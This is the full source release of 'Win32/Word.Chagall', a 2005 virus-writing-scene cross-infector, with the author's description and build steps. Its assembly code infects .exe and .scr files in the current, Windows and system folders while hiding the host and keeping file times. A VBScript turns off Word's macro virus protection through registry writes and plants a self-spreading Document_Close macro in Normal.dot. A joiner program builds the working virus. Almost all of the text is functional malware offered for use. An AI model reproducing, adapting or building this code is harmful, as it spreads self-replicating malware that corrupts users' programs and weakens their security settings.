;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Disclaimer: Attention! With this source code files you can make a living and working virus! I am NOT responsible for any damage you make with this bug! DO NEVER spread viruses or worms! It will bring trouble! This is just for education. TAKE CARE! Intro: Welcome to my first cross infector. This bug will infect executables at win32 environment and microsoft word documents. It took me a long time to finish this because i had no fun coding that vba/vbs stuff :D. But finally it's finished and i hope you have much fun with it. Description: Most cross infectors for PE/DOC i saw was nearly same thing, the word infection part was inside the exe in the data section. But i want (as always) make somethin new. So i decided to make two parts of the virus and then join it together. It works good, but need for a really good virus some more features, like encrypt the host file, encrypt the word part, just in one word encrypt the whole virus. Maybe later... Ok, now i will tell you from two situations how Chagall worx, one time from a .exe started, and other time from a .doc . Win32 Part: From a .exe or .scr started the virus will make following, step by step: - read Win32 part into memory - read Host file into memory - read Word part into memory - write host from memory to disk under name of infected file .sys - set attribute hidden to this .sys file - execute the host - infect files in current folder, windows folder and system folder - infect .exe and .scr files - keep file attributes and file time - infected file will look like this: #################### # Virus Win32 part # #################### #################### # Host file # #################### #################### # Virus Word part # #################### - check if word is running, if so dont infect Normal.dot because user will notice that somethin happends to Word - drop the Word part from memory to disk in the windows folder - make a copy of the virus in windows folder, Win32 part + Word part - execute the .vbs file, that will insert the Word part code into Normal.dot - delete this .vbs file - check for payload date, if it is 30.06. show a simple message box - exit virus Word Part: Let's say the virus comes from a .doc file into not infected system: - execute code when a document get's closed - read virus, Win32 part + Word part, from a variable inside the doc - write the virus to drive C:\ as Chag32.exe - execute this file, it will infect all .exe and .scr files, and then infect also the Nomal.dot - that makes the Word part not a typical macro virus, active infect normal, normal infect active - it is like a circle, active drop Win32 part, Win32 part infect normal and normal infect other active documents - nothin really great this Word part, no stealth, no encryption... just that it work, maybe someone want to make an advanced macro part? - please see Word part for more informations ;P Make a working Chagall: Hehe, because there are two parts it's not just like assemble and run kiddies :P. Save all in one folder, Chagall.asm, Chagall.vbs, size.equ and Joiner.asm . Then assemble Chagall.asm with FASM (www.flatassembler.org) and assemble Joiner.asm too. Now you have Chagall.exe, Chagall.vbs and Joiner.exe in one folder. run Joiner.exe and output should be ReadyChagall.exe. Attention, this is the working virus. Take care. Outro: I am proud to finish this bug, I hope you enjoy the code! Greets fly's out to all my real and cyber friends, to you the reader and to my mom, the name Chagall was her idea, it was some artist (like my mom) who makes gnaaarly pictures. For greets or fucks feel free to drop me a mail or make a guestbook entry at my page. Have a great day, and we see us in my next creation... ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" Chagall: call LoadInMem call ExecuteHost invoke GetCurrentDirectory,\ 256d,\ CurrentDir mov ebx, CurrentDir call MakePathValid mov ebx, CurrentDir mov ecx, 10d mov edx, ExeFiles call InfectFiles mov ebx, CurrentDir mov ecx, 10d mov edx, ScrFiles call InfectFiles invoke GetWindowsDirectory,\ WindowsDir,\ 256d mov ebx, WindowsDir call MakePathValid mov ebx, WindowsDir mov ecx, 15d mov edx, ExeFiles call InfectFiles mov ebx, WindowsDir mov ecx, 15d mov edx, ScrFiles call InfectFiles invoke GetSystemDirectory,\ SystemDir,\ 256d mov ebx, SystemDir call MakePathValid mov ebx, SystemDir mov ecx, 20d mov edx, ExeFiles call InfectFiles mov ebx, SystemDir mov ecx, 20d mov edx, ScrFiles call InfectFiles call IsWordRunning cmp ecx, SomethinFalse je Exit call DropWordInfector Exit: call LoadOutMem call Payload invoke ExitProcess,\ 0 ;*****LoadInMem*****Procedure*************************** LoadInMem: ;load virus (PE/DOC) and host in memory invoke GetModuleFileName,\ 0,\ HostFileName,\ 256d mov edx, OPEN_EXISTING mov ecx, GENERIC_READ mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je LoadInMemError mov edx, VirusMemHandle mov ebx, VirusMemStart mov ecx, VirusSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, VirusMemStart mov edx, VirusSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError invoke GetFileSize,\ dword [HostFileHandle],\ 0 sub eax, VirusSize sub eax, WordDropSize cmp eax, 0 je ReadWordDropper mov dword [HostFileSize], eax mov edx, HostMemHandle mov ebx, HostMemStart mov ecx, dword [HostFileSize] call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, HostMemStart mov edx, dword [HostFileSize] call ReadInMem cmp ecx, SomethinFalse je LoadInMemError ReadWordDropper: mov edx, WordMemHandle mov ebx, WordMemStart mov ecx, WordDropSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, WordMemStart mov edx, WordDropSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle call CloseHand LoadInMemError: mov ecx, SomethinFalse jmp LoadInMemReturn LoadInMemEnd: mov ecx, 0 LoadInMemReturn: ret ;*****LoadInMem*****Procedure***end********************* ;*****OpenFile*****Procedure**************************** OpenFile: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. GENERIC_WRITE 0,\ edx,\ ;open or create? FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ;*****OpenFile*****Procedure***end********************** ;*****GetMem*******Procedure**************************** GetMem: invoke GlobalAlloc,\ ;edx - pointer to handle GMEM_MOVEABLE,\ ;ebx - pointer to start address ecx ;ecx - size of memory to get mov dword [edx], eax cmp eax, 0 je GetInMemError invoke GlobalLock,\ dword [edx], mov dword [ebx], eax cmp eax, 0 jne GetInMemEnd GetInMemError: mov ecx, SomethinFalse jmp GetInMemReturn GetInMemEnd: mov ecx, 0 GetInMemReturn: ret ;*****GetMem++*****Procedure***end********************** ;*****ReadInMem*****Procedure*************************** ReadInMem: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to start address dword [ecx],\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInMemEnd mov ecx, SomethinFalse jmp ReadInMemReturn ReadInMemEnd: mov ecx, 0 ReadInMemReturn: ret ;*****ReadInMem*****Procedure*************************** ;*****CloseHand*****Procedure*************************** CloseHand: invoke CloseHandle,\ ;ebx - handle to close dword [ebx] ret ;*****CloseHand*****Procedure***end********************* ;*****ExecuteHost*****Procedure************************* ExecuteHost: mov ebx, HostFileName call GetEndOfString mov dword [ebx - 3d], "sys" invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle mov edx, HostMemStart mov ecx, dword [HostFileSize] call WriteToFile cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle call CloseHand invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_HIDDEN invoke GetCommandLine mov ebx, HostFileName mov edx, eax call ExecuteThis cmp ecx, SomethinFalse jne ExecuteHostEnd ExecuteHostError: mov ecx, SomethinFalse jmp ExecuteHostReturn ExecuteHostEnd: mov ecx, 0 ExecuteHostReturn: ret ;*****ExecuteHost*****Procedure***end******************* ;*****WriteToFile*****Procedure************************* WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle dword [edx],\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****WriteToFile*****Procedure***end******************* ;*****ExecuteThis*****Procedure************************* ExecuteThis: invoke CreateProcess,\ ebx,\ ;ebx - pointer to file to execute edx,\ ;edx - pointer to commandline 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ Startup,\ Process cmp eax, 0 jne ExecuteThisEnd mov ecx, SomethinFalse jmp ExecuteThisReturn ExecuteThisEnd: mov ecx, 0 ExecuteThisReturn: ret ;*****ExecuteThis*****Procedure***end******************* ;*****InfectFiles*****Procedure************************* InfectFiles: mov dword [InfectCount], ecx push edx invoke SetCurrentDirectory,\ ebx ;ebx - directory to infect ;ecx - infection counter cmp eax, 0 ;edx - pointer to victim string je InfectFilesError pop edx invoke FindFirstFile,\ edx,\ Win32FindData mov dword [FindHandle], eax FindMoreFiles: cmp eax, 0 je NoMoreFiles cmp dword [InfectCount], 0 je NoMoreFiles invoke GetFileAttributes,\ Win32FindData.cFileName mov dword [VictimAttributes], eax invoke SetFileAttributes,\ Win32FindData.cFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, OPEN_EXISTING mov ecx, GENERIC_READ + GENERIC_WRITE mov ebx, Win32FindData.cFileName call OpenFile mov dword [VictimHandle], eax cmp ecx, SomethinFalse je FindNextVictim invoke GetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime invoke GetFileSize,\ dword [VictimHandle],\ 0 mov dword [VictimSize], eax mov edx, VictimMemHandle mov ebx, VictimMemStart mov ecx, dword [VictimSize] call GetMem cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov ecx, VictimMemStart mov edx, dword [VictimSize] call ReadInMem cmp ecx, SomethinFalse je FindNextVictim mov ebx, dword [VictimMemStart] mov ecx, dword [VictimSize] GetInfectionMark: cmp dword [ebx], "CHAG" je FindNextVictim dec ecx cmp ecx, 0 je InfectThisFile inc ebx jmp GetInfectionMark InfectThisFile: invoke SetFilePointer,\ dword [VictimHandle],\ 0,\ 0,\ FILE_BEGIN mov ebx, VictimHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, VictimMemStart mov ecx, dword [VictimSize] call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile FindNextVictim: invoke SetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime mov ebx, VictimHandle call CloseHand invoke SetFileAttributes,\ Win32FindData.cFileName,\ dword [VictimAttributes] dec dword [InfectCount] invoke FindNextFile,\ dword [FindHandle],\ Win32FindData jmp FindMoreFiles NoMoreFiles: mov ebx, FindHandle call CloseHand mov ecx, 0 jmp InfectFilesReturn InfectFilesError: mov ecx, SomethinFalse InfectFilesReturn: ret ;*****InfectFiles*****Procedure***end******************* ;*****FreeMem*****Procedure***************************** FreeMem: invoke GlobalUnlock,\ ;ebx - handle to mem to free dword [ebx] invoke GlobalFree,\ dword [ebx] FreeMemEnd: ret ;*****FreeMem*****Procedure***end*********************** ;*****LoadOutMem*****Procedure************************** LoadOutMem: mov ebx, VirusMemHandle call FreeMem mov ebx, HostMemHandle call FreeMem mov ebx, WordMemHandle call FreeMem mov ebx, VictimMemHandle call FreeMem ret ;*****LoadOutMem*****Procedure***end********************* ;*****IsWordRunning*****Procedure************************ IsWordRunning: invoke Sleep,\ 20000 ;sleep 20 seconds, maybe word gets now closed invoke CreateToolhelp32Snapshot,\ ;check if word is running 2,\ ;if so dont infect normal.dot 0 ;because its in use mov dword [SnapHandle], eax mov dword [ProcessEntry], sizeof.PROCESSENTRY32 invoke Process32First,\ dword [SnapHandle],\ ProcessEntry FindNextProcess: cmp eax, 0 je NoWordIsRunning mov ebx, ProcessEntry.szExeFile call GetEndOfString cmp dword [ebx - 11d], "WINW" jne FindNextP cmp dword [ebx - 7d], "ORD." je WordIsRunning FindNextP: invoke Process32Next,\ dword [SnapHandle],\ ProcessEntry jmp FindNextProcess WordIsRunning: mov ecx, SomethinFalse jmp IsWordRunningReturn NoWordIsRunning: xor ecx, ecx IsWordRunningReturn: ret ;*****IsWordRunning*****Procedure***end****************** ;*****DropWordInfector*****Procedure********************* DropWordInfector: invoke GetWindowsDirectory,\ WindowsDirectory,\ 256d mov ebx, WindowsDirectory call MakePathValid invoke SetCurrentDirectory,\ WindowsDirectory cmp eax, 0 je DropWordInfectorError mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropName call OpenFile mov dword [WordDropHandle], eax cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle call CloseHand mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropExe call OpenFile mov dword [WordExeHandle], eax mov ebx, WordExeHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile mov ebx, WordExeHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile mov ebx, WordExeHandle call CloseHand invoke ShellExecute,\ 0,\ WordDropExecute,\ WordDropName,\ 0,\ 0,\ SW_HIDE cmp eax, 32 jbe DropWordInfectorError invoke Sleep,\ 10000 invoke DeleteFile,\ WordDropName mov ecx, 0 jmp DropWordInfectorReturn DropWordInfectorError: mov ecx, SomethinFalse DropWordInfectorReturn: ret ;*****DropWordInfector*****Procedure***end*************** ;*****MakePathValid*****Procedure************************ MakePathValid: cmp byte [ebx], 0 ;ebx - pointer to path string je CheckValidness inc ebx jmp MakePathValid CheckValidness: cmp byte [ebx - 1], "\" je PathIsValid mov byte [ebx], "\" mov byte [ebx + 1], 0 PathIsValid: ret ;*****MakePathValid*****Procedure***end****************** ;*****GetEndOfString*****Procedure*********************** GetEndOfString: ;ebx - pointer to string cmp byte [ebx], 0 je HaveEndOfString inc ebx jmp GetEndOfString HaveEndOfString: ret ;*****GetEndOfString*****Procedure***end***************** ;*****Payload*****Procedure****************************** Payload: invoke GetSystemTime,\ SystemTime cmp word [SystemTime.wMonth], 06d jne PayloadReturn cmp word [SystemTime.wDay], 30d jne PayloadReturn invoke MessageBox,\ 0,\ PayloadCaption,\ PayloadText,\ MB_ICONWARNING PayloadReturn: ret ;*****Payload*****Procedure***end************************ Datas: HostFileName rb 256d HostFileHandle dd ? VirusMemHandle dd ? VirusMemStart dd ? BytesRead dd ? BytesWrite dd ? HostFileSize dd ? HostMemHandle dd ? HostMemStart dd ? WordMemHandle dd ? WordMemStart dd ? FindHandle dd ? VictimHandle dd ? VictimSize dd ? VictimMemHandle dd ? VictimMemStart dd ? CurrentDir rb 256d ExeFiles db "*.exe",0 ScrFiles db "*.scr",0 InfectCount dd ? VictimAttributes dd ? WindowsDirectory rb 256d WordDropName db "chagall.vbs",0 WordDropHandle dd ? WordDropExecute db "open",0 WordDropExe db "chag.wrd",0 WordExeHandle dd ? SnapHandle dd ? WindowsDir rb 256d SystemDir rb 256d PayloadCaption db "Win32/Word.Chagall Virus by DiA/rrlf",0 PayloadText db "Bad news for you: you are infected with a virus",10,13 db "Good news for me: its my birthday ;)",10,13 db "So be happy with me at this day, turn of the computer and open a beer...",10,13,10,13 db "Thanks, DiA/Ready Rangers Liberation Front",0 struct PROCESSENTRY32 .dwSize dd ? .cntUsage dd ? .th32ProcessID dd ? .th32DefaultHeapID dd ? .th32ModuleID dd ? .cntThreads dd ? .th32ParentProcessID dd ? .pcPriClassBase dd ? .dwFlags dd ? .szExeFile rb 260d ends Startup STARTUPINFO Process PROCESS_INFORMATION Win32FindData FINDDATA Filetime FILETIME ProcessEntry PROCESSENTRY32 SystemTime SYSTEMTIME data import library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ shell32, "SHELL32.DLL" import kernel32,\ GetModuleFileName, "GetModuleFileNameA",\ CreateFile, "CreateFileA",\ GlobalAlloc, "GlobalAlloc",\ GlobalLock, "GlobalLock",\ ReadFile, "ReadFile",\ GetFileSize, "GetFileSize",\ CloseHandle, "CloseHandle",\ WriteFile, "WriteFile",\ CreateProcess, "CreateProcessA",\ GetCommandLine, "GetCommandLineA",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ SetFilePointer, "SetFilePointer",\ GlobalUnlock, "GlobalUnlock",\ GlobalFree, "GlobalFree",\ GetFileAttributes, "GetFileAttributesA",\ SetFileAttributes, "SetFileAttributesA",\ GetFileTime, "GetFileTime",\ SetFileTime, "SetFileTime",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ GetSystemDirectory, "GetSystemDirectoryA",\ DeleteFile, "DeleteFileA",\ Sleep, "Sleep",\ CopyFile, "CopyFileA",\ CreateToolhelp32Snapshot,"CreateToolhelp32Snapshot",\ Process32First, "Process32First",\ Process32Next, "Process32Next",\ GetSystemTime, "GetSystemTime",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import shell32,\ ShellExecute, "ShellExecuteA" end data ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; On Error Resume Next Set Word = WScript.CreateObject("Word.Application") Set Shell = CreateObject("WScript.Shell") Set N = Word.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule Word.Options.VirusProtection = False Word.Options.ConfirmConversion = False Word.Options.SaveNormalPrompt = False RegPath = "HKCU\Software\Microsoft\Office\" & Word.Application.Version & "\Word\Security\" Shell.RegWrite RegPath & "Level", 1, "REG_DWORD" Shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD" N.DeleteLines 1, N.CountOfLines N.InsertLines 1, "Private Sub Document_Close()" N.InsertLines 2, "On Error Resume Next" N.InsertLines 3, "Options.VirusProtection = False" N.InsertLines 4, "Options.SaveNormalPrompt = False" N.InsertLines 5, "Options.ConfirmConversions = False" N.InsertLines 6, "Set VirCode = NormalTemplate.VBProject.VBComponents(1).CodeModule" N.InsertLines 7, "Set ActiveD = ActiveDocument.VBProject.VBComponents(1)" N.InsertLines 8, "Set ActCode = ActiveD.CodeModule" N.InsertLines 9, "If ActiveD.Name = ""Chagall"" Then" N.InsertLines 10, "GoTo DropExe" N.InsertLines 11, "Else" N.InsertLines 12, "ActCode.DeleteLines 1, ActCode.CountOfLines" N.InsertLines 13, "ActCode.InsertLines 1, VirCode.Lines(1, VirCode.CountOfLines)" N.InsertLines 14, "ActiveD.Name = ""Chagall""" N.InsertLines 15, "End If" N.InsertLines 16, "DropExe:" N.InsertLines 17, "Dim AExeFile As String" N.InsertLines 18, "Dim NExeFile As String" N.InsertLines 19, "AExeFile = ActiveDocument.Variables(""llagahc"").Value" N.InsertLines 20, "NExeFile = Normal.ThisDocument.Variables(""llagahc"").Value" N.InsertLines 21, "If NExeFile = """" Then" N.InsertLines 22, "Open Environ(""WinDir"") & ""\Chag.wrd"" For Binary As #1" N.InsertLines 23, "NExeFile = Space(LOF(1))" N.InsertLines 24, "Get #1, , NExeFile" N.InsertLines 25, "Close #1" N.InsertLines 26, "Normal.ThisDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 27, "End If" N.InsertLines 28, "If AExeFile = """" Then" N.InsertLines 29, "ActiveDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 30, "End If" N.InsertLines 31, "Open Left(Environ(""WinDir""), 3) & ""Chag32.exe"" For Binary As #1" N.InsertLines 32, "Put #1, , NExeFile" N.InsertLines 33, "Close #1" N.InsertLines 34, "Shell Left(Environ(""WinDir""), 3) & ""Chag32.exe""" N.InsertLines 35, "If Left(ActiveDocument.Name, 2) = ""Do"" And IsNumeric(Right(ActiveDocument.Name, 1)) = True Then" N.InsertLines 36, "ActiveDocument.Saved = True" N.InsertLines 37, "Else" N.InsertLines 38, "ActiveDocument.SaveAs ActiveDocument.FullName" N.InsertLines 39, "End If" N.InsertLines 40, "End Sub" Word.Quit ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; VirusSize equ 2205d ;packed with fsg! WordDropSize equ 2671d SomethinFalse equ 1313d ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" .data Win32PartName db "Chagall.exe",0 Win32PartHandle dd ? Win32PartBuffer rb VirusSize WordPartName db "Chagall.vbs", 0 WordPartHandle dd ? WordPartBuffer rb WordDropSize OutputFileName db "ReadyChagall.exe",0 OutputFileHandle dd ? BytesRead dd ? BytesWrite dd ? .code Joiner: ;*****read win32 and word part into buffer************ mov ebx, Win32PartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [Win32PartHandle], eax cmp ecx, SomethinFalse je CantReadWin32Part mov ebx, Win32PartHandle mov ecx, Win32PartBuffer mov edx, VirusSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWin32Part invoke CloseHandle,\ dword [Win32PartHandle] mov ebx, WordPartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [WordPartHandle], eax cmp ecx, SomethinFalse je CantReadWordPart mov ebx, WordPartHandle mov ecx, WordPartBuffer mov edx, WordDropSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWordPart invoke CloseHandle,\ dword [WordPartHandle] ;*****read win32, firstgen and word part into buffer***end****** ;*****write win32, firstgen and word part to file*************** mov ebx, OutputFileName mov ecx, GENERIC_WRITE mov edx, CREATE_ALWAYS call OpenFile_ mov dword [OutputFileHandle], eax cmp ecx, SomethinFalse je CantCreateOutputFile mov ebx, OutputFileHandle mov edx, Win32PartBuffer mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWin32Part mov ebx, OutputFileHandle mov edx, WordPartBuffer mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWordPart invoke CloseHandle,\ dword [OutputFileHandle] invoke MessageBox,\ 0,\ "OutputFile successfully written. Take care, now it is a living VIRUS!",\ "success - Win32/Word.Chagall is now working",\ MB_ICONINFORMATION jmp Exit ;*****write win32, firstgen and word part to file*************** ;*****error messages******************************************** CantReadWin32Part: invoke MessageBox,\ 0,\ "Cant read the Win32 part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantReadWordPart: invoke MessageBox,\ 0,\ "Cant read the Word part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantCreateOutputFile: invoke MessageBox,\ 0,\ "Cant create the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWin32Part: invoke MessageBox,\ 0,\ "Cant write the Win32 part to the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWordPart: invoke MessageBox,\ 0,\ "Cant write the Word part to the output file",\ "error",\ MB_ICONERROR ;*****error messages***end************************************** Exit: invoke ExitProcess,\ 0 ;*****Procedures Open, Read and Write files********************* OpenFile_: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. GENERIC_WRITE 0,\ edx,\ FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ReadInBuffer: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to buffer start ecx,\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInBufferEnd mov ecx, SomethinFalse jmp ReadBufferReturn ReadInBufferEnd: mov ecx, 0 ReadBufferReturn: ret WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle edx,\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****Procedures Open, Read and Write files***end*************** .end Joiner ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;